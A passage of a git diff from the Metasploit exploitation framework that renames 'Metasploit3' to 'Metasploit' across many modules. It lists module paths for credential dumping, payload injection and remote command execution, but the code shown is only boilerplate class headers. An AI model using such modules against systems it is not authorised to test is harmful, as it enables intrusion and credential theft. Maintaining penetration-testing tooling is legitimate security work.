modules/post/windows/gather/enum_ad_groups.rb | 2 +- modules/post/windows/gather/enum_ad_managedby_groups.rb | 2 +- modules/post/windows/gather/enum_ad_service_principal_names.rb | 2 +- modules/post/windows/gather/enum_ad_to_wordlist.rb | 2 +- modules/post/windows/gather/enum_ad_user_comments.rb | 2 +- modules/post/windows/gather/enum_ad_users.rb | 2 +- modules/post/windows/gather/enum_applications.rb | 2 +- modules/post/windows/gather/enum_artifacts.rb | 2 +- modules/post/windows/gather/enum_av_excluded.rb | 2 +- modules/post/windows/gather/enum_chrome.rb | 2 +- modules/post/windows/gather/enum_computers.rb | 2 +- modules/post/windows/gather/enum_db.rb | 2 +- modules/post/windows/gather/enum_devices.rb | 2 +- modules/post/windows/gather/enum_dirperms.rb | 2 +- modules/post/windows/gather/enum_domain.rb | 2 +- modules/post/windows/gather/enum_domain_group_users.rb | 2 +- modules/post/windows/gather/enum_domain_tokens.rb | 2 +- modules/post/windows/gather/enum_domain_users.rb | 2 +- modules/post/windows/gather/enum_domains.rb | 2 +- modules/post/windows/gather/enum_files.rb | 2 +- modules/post/windows/gather/enum_hostfile.rb | 2 +- modules/post/windows/gather/enum_ie.rb | 2 +- modules/post/windows/gather/enum_logged_on_users.rb | 2 +- modules/post/windows/gather/enum_ms_product_keys.rb | 2 +- modules/post/windows/gather/enum_muicache.rb | 2 +- modules/post/windows/gather/enum_patches.rb | 2 +- modules/post/windows/gather/enum_powershell_env.rb | 2 +- modules/post/windows/gather/enum_prefetch.rb | 2 +- modules/post/windows/gather/enum_proxy.rb | 2 +- modules/post/windows/gather/enum_putty_saved_sessions.rb | 2 +- modules/post/windows/gather/enum_services.rb | 2 +- modules/post/windows/gather/enum_shares.rb | 2 +- modules/post/windows/gather/enum_snmp.rb | 2 +- modules/post/windows/gather/enum_termserv.rb | 2 +- modules/post/windows/gather/enum_tokens.rb | 2 +- modules/post/windows/gather/enum_tomcat.rb | 2 +- modules/post/windows/gather/enum_unattend.rb | 2 +- modules/post/windows/gather/file_from_raw_ntfs.rb | 2 +- modules/post/windows/gather/forensics/browser_history.rb | 2 +- modules/post/windows/gather/forensics/duqu_check.rb | 2 +- modules/post/windows/gather/forensics/enum_drives.rb | 2 +- modules/post/windows/gather/forensics/imager.rb | 2 +- modules/post/windows/gather/forensics/nbd_server.rb | 2 +- modules/post/windows/gather/forensics/recovery_files.rb | 2 +- modules/post/windows/gather/hashdump.rb | 2 +- modules/post/windows/gather/local_admin_search_enum.rb | 2 +- modules/post/windows/gather/lsa_secrets.rb | 2 +- modules/post/windows/gather/memory_grep.rb | 2 +- modules/post/windows/gather/netlm_downgrade.rb | 2 +- modules/post/windows/gather/outlook.rb | 2 +- modules/post/windows/gather/phish_windows_credentials.rb | 2 +- modules/post/windows/gather/resolve_sid.rb | 2 +- modules/post/windows/gather/reverse_lookup.rb | 2 +- modules/post/windows/gather/screen_spy.rb | 2 +- modules/post/windows/gather/smart_hashdump.rb | 2 +- modules/post/windows/gather/tcpnetstat.rb | 2 +- modules/post/windows/gather/usb_history.rb | 2 +- modules/post/windows/gather/win_privs.rb | 2 +- modules/post/windows/gather/wmic_command.rb | 2 +- modules/post/windows/gather/word_unc_injector.rb | 2 +- modules/post/windows/manage/add_user_domain.rb | 2 +- modules/post/windows/manage/autoroute.rb | 2 +- modules/post/windows/manage/change_password.rb | 2 +- modules/post/windows/manage/clone_proxy_settings.rb | 2 +- modules/post/windows/manage/delete_user.rb | 2 +- modules/post/windows/manage/download_exec.rb | 2 +- modules/post/windows/manage/driver_loader.rb | 2 +- modules/post/windows/manage/enable_rdp.rb | 2 +- modules/post/windows/manage/enable_support_account.rb | 2 +- modules/post/windows/manage/exec_powershell.rb | 2 +- modules/post/windows/manage/forward_pageant.rb | 2 +- modules/post/windows/manage/ie_proxypac.rb | 2 +- modules/post/windows/manage/inject_ca.rb | 2 +- modules/post/windows/manage/inject_host.rb | 2 +- modules/post/windows/manage/migrate.rb | 2 +- modules/post/windows/manage/mssql_local_auth_bypass.rb | 2 +- modules/post/windows/manage/multi_meterpreter_inject.rb | 2 +- modules/post/windows/manage/nbd_server.rb | 2 +- modules/post/windows/manage/payload_inject.rb | 2 +- modules/post/windows/manage/portproxy.rb | 2 +- modules/post/windows/manage/powershell/exec_powershell.rb | 2 +- modules/post/windows/manage/powershell/load_script.rb | 2 +- modules/post/windows/manage/pptp_tunnel.rb | 2 +- modules/post/windows/manage/priv_migrate.rb | 2 +- modules/post/windows/manage/pxeexploit.rb | 2 +- modules/post/windows/manage/reflective_dll_inject.rb | 2 +- modules/post/windows/manage/remove_ca.rb | 2 +- modules/post/windows/manage/remove_host.rb | 2 +- modules/post/windows/manage/rpcapd_start.rb | 2 +- modules/post/windows/manage/run_as.rb | 2 +- modules/post/windows/manage/sdel.rb | 2 +- modules/post/windows/manage/smart_migrate.rb | 2 +- modules/post/windows/manage/vss_create.rb | 2 +- modules/post/windows/manage/vss_list.rb | 2 +- modules/post/windows/manage/vss_mount.rb | 2 +- modules/post/windows/manage/vss_set_storage.rb | 2 +- modules/post/windows/manage/vss_storage.rb | 2 +- modules/post/windows/manage/webcam.rb | 2 +- modules/post/windows/recon/computer_browser_discovery.rb | 2 +- modules/post/windows/recon/outbound_ports.rb | 2 +- modules/post/windows/recon/resolve_ip.rb | 2 +- modules/post/windows/wlan/wlan_bss_list.rb | 2 +- modules/post/windows/wlan/wlan_current_connection.rb | 2 +- modules/post/windows/wlan/wlan_disconnect.rb | 2 +- modules/post/windows/wlan/wlan_profile.rb | 2 +- 2539 files changed, 2539 insertions(+), 2539 deletions(-) diff --git a/modules/auxiliary/admin/2wire/xslt_password_reset.rb b/modules/auxiliary/admin/2wire/xslt_password_reset.rb index ee2572bebb..a5ea810cf9 100644 --- a/modules/auxiliary/admin/2wire/xslt_password_reset.rb +++ b/modules/auxiliary/admin/2wire/xslt_password_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb index d3aed5b3dc..a17e18662e 100644 --- a/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb +++ b/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/atg/atg_client.rb b/modules/auxiliary/admin/atg/atg_client.rb index 357338b434..8c6b8e8ebe 100644 --- a/modules/auxiliary/admin/atg/atg_client.rb +++ b/modules/auxiliary/admin/atg/atg_client.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 7f76f33d07..23fb5ef068 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::NDMP diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 171d2d7a04..0c52fa52df 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include ::Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index c706eea4f0..40658ead7f 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/db2/db2rcmd.rb b/modules/auxiliary/admin/db2/db2rcmd.rb index 6f8d5738fb..01b31d2ac1 100644 --- a/modules/auxiliary/admin/db2/db2rcmd.rb +++ b/modules/auxiliary/admin/db2/db2rcmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index ce62291515..7108b755fa 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb index 9fbc5aff7d..cf5291f7a1 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index e2970315f0..8e912c1f7c 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index 1c54a65368..c0a27c9503 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index 1c99844b0f..c0996f536d 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index 3f21a39c33..af93a94055 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb index 55f85637ae..abc96e5150 100644 --- a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb +++ b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 6e6a7939a0..3089307412 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb index 725f125d26..e933ab6436 100644 --- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb +++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb index cc807330d1..bb2e3f48e2 100644 --- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb +++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index e7e9f7de48..7281c70f9e 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb index cb17b5cc91..e282836f5d 100644 --- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 5a1fcb3cd2..b2e2be1807 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index 0d999c859a..cef2cd2e8f 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 036a3ee2cc..d4773df9d8 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index e3b3932032..7775a44268 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb index 1e1d9dbf8d..203ccb1e89 100644 --- a/modules/auxiliary/admin/http/jboss_bshdeployer.rb +++ b/modules/auxiliary/admin/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss diff --git a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb index a427ac2009..50dad450a1 100644 --- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb +++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::JBoss diff --git a/modules/auxiliary/admin/http/jboss_seam_exec.rb b/modules/auxiliary/admin/http/jboss_seam_exec.rb index e6b097d165..10de5cc9a9 100644 --- a/modules/auxiliary/admin/http/jboss_seam_exec.rb +++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/kaseya_master_admin.rb b/modules/auxiliary/admin/http/kaseya_master_admin.rb index d7046167c7..a631c0abbb 100644 --- a/modules/auxiliary/admin/http/kaseya_master_admin.rb +++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/limesurvey_file_download.rb b/modules/auxiliary/admin/http/limesurvey_file_download.rb index a1c019c933..13fc6f3a08 100644 --- a/modules/auxiliary/admin/http/limesurvey_file_download.rb +++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb @@ -8,7 +8,7 @@ require 'msf/core' # for extracting files require 'zip' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb index 0bae51aafa..14162c3de7 100644 --- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb +++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb index f5b371da2b..d5f3a5fffd 100644 --- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb +++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index c1ad331aae..9c728fcc6a 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb index 871d6c8830..26077c3ea1 100644 --- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb +++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/manageengine_dir_listing.rb b/modules/auxiliary/admin/http/manageengine_dir_listing.rb index 9d782c370c..82f2509e42 100644 --- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb +++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manageengine_file_download.rb b/modules/auxiliary/admin/http/manageengine_file_download.rb index fe04617a13..2f0005eef9 100644 --- a/modules/auxiliary/admin/http/manageengine_file_download.rb +++ b/modules/auxiliary/admin/http/manageengine_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 0dc6890946..d1e6606939 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index d42ee31992..bfb8a8497c 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netflow_file_download.rb b/modules/auxiliary/admin/http/netflow_file_download.rb index 5b920ae2c0..548cc44630 100644 --- a/modules/auxiliary/admin/http/netflow_file_download.rb +++ b/modules/auxiliary/admin/http/netflow_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb index f7e8ee50c1..676f9ab595 100644 --- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb +++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index 6a12988779..f8edfbf2f9 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 991b706893..6023a2b02d 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/element' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb index 4f7a947b08..d6fd938bef 100644 --- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb +++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index ee19d364b1..a4cc833721 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb +++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/sysaid_admin_acct.rb b/modules/auxiliary/admin/http/sysaid_admin_acct.rb index ed9226caa4..852b1f2745 100644 --- a/modules/auxiliary/admin/http/sysaid_admin_acct.rb +++ b/modules/auxiliary/admin/http/sysaid_admin_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/sysaid_file_download.rb b/modules/auxiliary/admin/http/sysaid_file_download.rb index f010b3f631..936ba933d5 100644 --- a/modules/auxiliary/admin/http/sysaid_file_download.rb +++ b/modules/auxiliary/admin/http/sysaid_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/sysaid_sql_creds.rb b/modules/auxiliary/admin/http/sysaid_sql_creds.rb index 308d928a81..7a6d093916 100644 --- a/modules/auxiliary/admin/http/sysaid_sql_creds.rb +++ b/modules/auxiliary/admin/http/sysaid_sql_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'openssl' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/tomcat_administration.rb b/modules/auxiliary/admin/http/tomcat_administration.rb index b987960189..9f584f16d7 100644 --- a/modules/auxiliary/admin/http/tomcat_administration.rb +++ b/modules/auxiliary/admin/http/tomcat_administration.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index ae1f0a6a32..0b52b65e57 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb index 5e5043da0e..88094b0f81 100644 --- a/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb +++ b/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb index 3e43c502d6..827df081ff 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_002.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_002.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb index bba990712d..da7e6cf540 100644 --- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb +++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb index 21cb5b66ce..c19487ffa1 100644 --- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb +++ 